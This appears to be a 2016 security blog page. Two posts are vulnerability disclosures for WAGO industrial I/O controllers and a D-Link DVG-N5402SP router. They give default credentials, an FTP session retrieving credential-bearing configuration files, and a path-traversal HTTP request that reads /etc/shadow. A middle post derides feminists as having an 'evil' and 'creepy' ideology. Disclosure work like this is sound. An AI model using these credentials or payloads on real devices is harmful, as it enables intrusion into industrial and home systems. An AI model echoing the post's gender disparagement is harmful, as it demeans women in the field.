Wednesday, February 10, 2016

[ICS] WAGO IO 758-870, 750-849, 750-849 vulnerabilities

[ICS] WAGO IO 758-870, 750-849, 750-849 vulnerabilities

Reported these issues to WAGO via ICS-CERT last year. Initially, WAGO's team declared these reports as invalid because there is no Linux in the models and no ethernet connectivity. My first reaction was lol & wtf - the vendor doesn't know about its own product. And then I sent the device manual url to them, after which they went quiet.

Background
According to WAGO’s Web site, WAGO is an international company based in Germany. They operate production facilities in Germany, Switzerland, Poland, China, and India. WAGO maintains offices worldwide.

According to WAGO, its products are deployed across several sectors including manufacturing, building automation, electric generation, transportation, and others. WAGO estimates that these products are used worldwide.


Vulnerability Details

Weak Credential Management
CVE-ID: CVE-2015-6472

Affected models:

WAGO IO 750-849 & 750-881
Modular I/O System. WAGO-I/O-IPC web-based management

Order number    750-849

Firmware revision       01.01.27 (04) 
Order number    750-849
Firmware revision       01.02.05 (03)

WAGO IO 758-870

Modular I/O System. WAGO-I/O-IPC web-based management

WAGO device models 750-849 and 750-881 come configured, by default, with three (3) accounts having default, hard-coded credentials.

admin - wago
user - user
guest - guest

WAGO device model 758-870 comes configured, by default, with five (5) accounts having default, hard-coded credentials.

root:wago
admin:wago
user:user
www:www
guest:guest

Impact
Attackers are able to exploit these vulnerabilities by using the default credentials to gain unauthorized administrative access to the systems.

No privilege separation
CVE-ID: CVE-2015-6473

Affected models:

WAGO IO 750-849 & 750-881
Modular I/O System. WAGO-I/O-IPC web-based management

Order number    750-849

Firmware revision       01.01.27 (04) 
Order number    750-881
Firmware revision       01.02.05 (03)

All three accounts can manage the device via HTTP(S) with full privileges. There seems to be no privilege separation when logged in as any user - all the functionality is available to these three accounts - admin, user, guest.

Impact

Attackers can control the device using any of the three default accounts & perform any changes without any restrictions.

Insecure ftp configuration / filesystem permissions

CVE-ID: XXX

WAGO IO 758-870 device also runs a FTP server. All the five (5) users documented above can log in over FTP. The FTP server configuration and filesystem permissions are set up insecurely and allows unauthorized file access. 

a. Login to FTP as 'guest' user
b. Should have no access ideally outside ftproot /
c. ’guest' can still access any file system location
d. Multiple files across the file system have too open / unrestricted access permissions. 'guest' can access multiple, critical files.
e. Also, access control is not enforced sufficiently, consistently & correctly. For example, ‘guest’ user is restricted and cannot download the /etc/passwd on the first attempt. However, the system allows download of /etc/passwd file in the second attempt performed from a different directory with loose access permissions.


PoC

Connected to <IP>.

220 FTP server ready.
Name: guest
331 User guest OK. Password required
Password: 
230 OK. Current directory is /home/guest
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Extended Passive mode OK (|||53957|)
150 Accepted data connection
226-Options: -l 
226 0 matches total
ftp> ls
229 Extended Passive mode OK (|||24432|)
150 Accepted data connection
226-Options: -l 
226 0 matches total


ftp> ls /etc/

229 Extended Passive mode OK (|||29997|)
150 Accepted data connection
-rw-r--r--    1 0        0              44 Sep 27  2010 LICENSE
-rw-r--r--    1 0        0              22 Oct  1  2010 REVISIONS
-rw-rw-rw-    1 0        0              26 Jun  7  2010 TZ
-rw-r--r--    1 0        0              96 Oct  1  2010 VIDEO_MODES
-rwxr-xr-x    1 0        0             271 Oct  1  2010 cfg-kbus-irq.sh
drwxrwsrwx    2 0        0            2048 Mar  3 14:39 config-tools
-rw-r--r--    1 0        0             504 Oct  1  2010 fstab
-rw-r--r--    1 0        0              80 Oct  1  2010 group
-rw-r-----    1 0        0              27 Oct  1  2010 gshadow
-rw-r--r--    1 0        0              16 Oct  1  2010 homepartition
-rw-rw-rw-    1 0        0              12 Oct  1  2010 hostname
-rw-r--r--    1 0        0              20 Oct  1  2010 hosts
drwxr-xr-x    2 0        0            1024 Oct  1  2010 hotplug
drwxr-xr-x    3 0        0            1024 Oct  1  2010 hotplug.d
drwxr-xr-x    2 0        0            1024 Oct  1  2010 ifplugd
-rw-r--r--    1 0        0              58 Oct  1  2010 inetd.conf
drwxrwxrwx    2 0        0            1024 Mar  2 18:15 init.d
-rw-r--r--    1 0        0             319 Oct 27  2014 inittab
-rw-r--r--    1 0        0             842 Jun  7  2010 inputrc
-rw-r--r--    1 0        0             128 Jun  7  2010 ipkg.conf
drwxr-xr-x    2 0        0            1024 Jun 15 21:42 lighttpd
lrwxrwxrwx    1 0        0              12 Oct  1  2010 mtab -> /proc/mounts
drwxrwxrwx    6 0        0            1024 Feb 24 18:22 network
-rw-r--r--    1 0        0            1181 Oct  1  2010 nsswitch.conf
-rw-r--r--    1 0        0              40 Oct  1  2010 partitions
-rw-r--r--    1 0        0             459 Oct  1  2010 passwd
drwxr-xr-x    2 0        0            1024 Oct  1  2010 php5
------x---    1 0        0              53 Mar  3 14:40 pointercal
-rw-r--r--    1 0        0             536 Oct  1  2010 profile
-rw-r--r--    1 0        0             178 Oct  1  2010 protocols
-rw-r--r--    1 0        0               8 Jun  7  2010 pure-ftpd.conf
drwxrwxrwx    2 0        0            1024 Oct  1  2010 rc.d
-rw-rw-rw-    1 0        0              53 Oct  1  2010 resolv.conf
-rw-r--r--    1 0        0              14 Oct  1  2010 rootpartition
-rw-rw-rw-    1 0        0             341 Mar  2 17:08 rts3s.cfg
-rwxr-xr-x    1 0        0            3012 Jun  7  2010 screenrc
-rw-r--r--    1 0        0            9590 Oct  1  2010 services
-rw-r-----    1 0        0             338 Oct  1  2010 shadow
-rw-------    1 0        0             280 Oct  1  2010 shadow-
-r--r-----    1 0        0            1712 Jun  7  2010 sudoers
-rwxrwxrwx    1 0        0              25 Jun  7  2010 timezone
-rwxr-xr-x    1 0        0             511 Mar  3 14:37 ts.conf
drwxr-xr-x    3 0        0            1024 Oct  1  2010 udev
-rwxr-xr--    1 0        0             798 Oct  1  2010 udhcpc.script
-rw-r--r--    1 0        0             357 Jun 15 21:42 webserver_conf.xml


226-Options: -l 

226 45 matches total

Note: As seen above, access permissions are too open on multiple files and directories.

ftp> get /etc/shadow
local: /etc/shadow remote: /etc/shadow
ftp: Can't access `/etc/shadow': Permission denied
ftp> get /etc/passwd
local: /etc/passwd remote: /etc/passwd
ftp: Can't access `/etc/passwd': Permission denied
ftp> get /etc/webserver_conf.xml
local: /etc/webserver_conf.xml remote: /etc/webserver_conf.xml
ftp: Can't access `/etc/webserver_conf.xml': Permission denied
ftp> get /etc/pure-ftpd.conf
local: /etc/pure-ftpd.conf remote: /etc/pure-ftpd.conf
ftp: Can't access `/etc/pure-ftpd.conf': Permission denied

ftp> cd /etc/lighttpd <— drwxr-xr-x
250 OK. Current directory is /etc/lighttpd
ftp> ls
229 Extended Passive mode OK (|||10281|)
150 Accepted data connection
-rw-r--r--    1 12       102            65 Jun  7  2010 lighttpd-htpasswd.user
-rw-r--r--    1 12       102          3743 Jun 15 21:42 lighttpd.conf
-rw-r--r--    1 12       102           414 Jun  7  2010 mod_fastcgi.conf

226-Options: -l 
226 3 matches total

ftp> get lighttpd-htpasswd.user
local: lighttpd-htpasswd.user remote: lighttpd-htpasswd.user
229 Extended Passive mode OK (|||52622|)
150 Accepted data connection
100% |***********************************************************************************************************|    65      484.55 KiB/s    00:00 ETA

226-File successfully transferred

226 0.001 seconds (measured here), 71.89 Kbytes per second
65 bytes received in 00:00 (3.14 KiB/s)
ftp> 

ftp> get lighttpd.conf
local: lighttpd.conf remote: lighttpd.conf
229 Extended Passive mode OK (|||9954|)
150 Accepted data connection
100% |***********************************************************************************************************|  3743      243.10 KiB/s    00:00 ETA

226-File successfully transferred

226 0.015 seconds (measured here), 249.64 Kbytes per second
3743 bytes received in 00:00 (160.62 KiB/s)
…..

Note: Above configuration files contain credentials.

Once in this directory, we can now also access /etc/passwd file
Note: still cannot access /etc/shadow

ftp> get /etc/passwd

local: /etc/passwd remote: /etc/passwd
229 Extended Passive mode OK (|||1859|)
150 Accepted data connection
100% |***********************************************************************************************************|   459        3.77 MiB/s    00:00 ETA

226-File successfully transferred

226 0.003 seconds (measured here), 143.76 Kbytes per second
459 bytes received in 00:00 (35.35 KiB/s)

ftp> get /etc/shadow

local: /etc/shadow remote: /etc/shadow
229 Extended Passive mode OK (|||61612|)
550 Can't open shadow: Permission denied

+++++


InfoSec/Pentesting - a dude's gang?

I was browsing the interwebs and came across one blog post (link below). It is always nice to read about other people's experiences, their plan of action, their thought process, when working towards a certification, or, any other objective for that matter.

The poster is sharing her experience with OSCP certification (Pentesting with Kali). It is a fairly okay read. She passed the OSCP and it is definitely worth a genuine Congratulations!


Personally, though, her last statement, turned the entire writeup sour. She says & I quote:
"Being a woman in Infosec isn't easy. But to earn the respect of this dude’s gang, you need to play it right."


Now, I do not know her personally or professionally. But that last closing statement sounded much as a feminist. And I wanted to put forth my views on it.


+++++
"Being a woman in infosec isn't easy."
InfoSec & Penetration testing, to be specific, is a dynamic, specialized domain. You've got to consistently, & continuously, study, research, discuss, learn, share, practice, and then learn some more. And this is expected of any InfoSec professional - not just a 'woman.' It is stupid & pointless that she chose to add a 'woman' in this statement. Somehow, she seems to expect woman should have a different, simplified playing field in InfoSec than their male counterparts in InfoSec. A typical feminist attribute.

Oh you're a girl in this male-dominated InfoSec club? Let me make it easy for you. Here, I have pwn'd this box, these are the creds, you only ssh in, just take screen caps and focus on looking good in customer debriefs. Alright?


"But to earn the respect of this dude's gang, you need to play it right."
Ridiculous, uneducated & a skewed viewpoint. There is no InfoSec dude's brotherhood, no InfoSec crips & bloods or InfoSec KKK clans, keeping women out.

Professional respect is NOT based on gender. Remember (RIP) Shon Harris.?

To earn professional respect, a lot of effort goes in & rightly so. First & foremost, you must have an unshakeable passion - a passion to learn continuously, irrespective of how much you already know or how much you have grown in your career & finances. An undying passion to go on learning, & researching, sharing with community, and simply to do more.

Next, you've got to toil. There is no short-cut. There is no substitute for hard-work, perseverance, passion, commitment & of course coffee. This is how someone plays right.

If you are genuinely & passionately putting in the efforts, professional respect will come in automagically. Everyone should strive for it, but focus must always be on giving your best, even if your peers or boss ignore / downplay your accomplishments.

+++++

As if feminists hadn't had much evil fun in other aspects of life, it would be a pity if their creepy ideology seeps in to InfoSec industry.

Comments are welcome.

Thursday, February 4, 2016

DLink DVG­N5402SP Multiple Vulnerabilities

# Exploit Title: [DLink DVG­N5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]

DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

Vulnerable Models, Firmware, Hardware versions
DVG­N5402SP Web Management
Model Name : GPN2.4P21­C­CN
Firmware Version : W1000CN­00
Firmware Version :W1000CN­03
Firmware Version :W2000EN­00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21­C_WIFI­V0.05

Device can be managed through three users:
1. super ­ full privileges
2. admin ­ full privileges
3. support ­ restricted user

1. Path traversal
Arbitrary files can be read off of the device file system. No authentication is required to exploit this vulnerability.
CVE-ID: CVE-2015-7245

HTTP Request

POST /cgi­bin/webproc HTTP/1.1
Host: :8080
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: http://:8080/cgi­bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

HTTP Response

HTTP/1.0 200 OK
pstVal­>name:getpage; pstVal­>value:html/main.html
pstVal­>name:getpage; pstVal­>value:html/index.html
pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup
pstVal­>name:var:page; pstVal­>value:connected
pstVal­>name:var:subpage; pstVal­>value:­
pstVal­>name:obj­action; pstVal­>value:auth
pstVal­>name::username; pstVal­>value:super
pstVal­>name::password; pstVal­>value:super
pstVal­>name::action; pstVal­>value:login
pstVal­>name::sessionid; pstVal­>value:1ac5da6b
Connection: close
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/

#root::13796:0:99999:7:::
root::13796:0:99999:7:::
#tw::13796:0:99999:7:::
#tw::13796:0:99999:7:::

2. Use of Default, Hard­Coded Credentials
CVE-ID: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw).
Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability.

3.Sensitive info leakage via device running configuration backup
CVE-ID:
CVE-2015-7247

Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.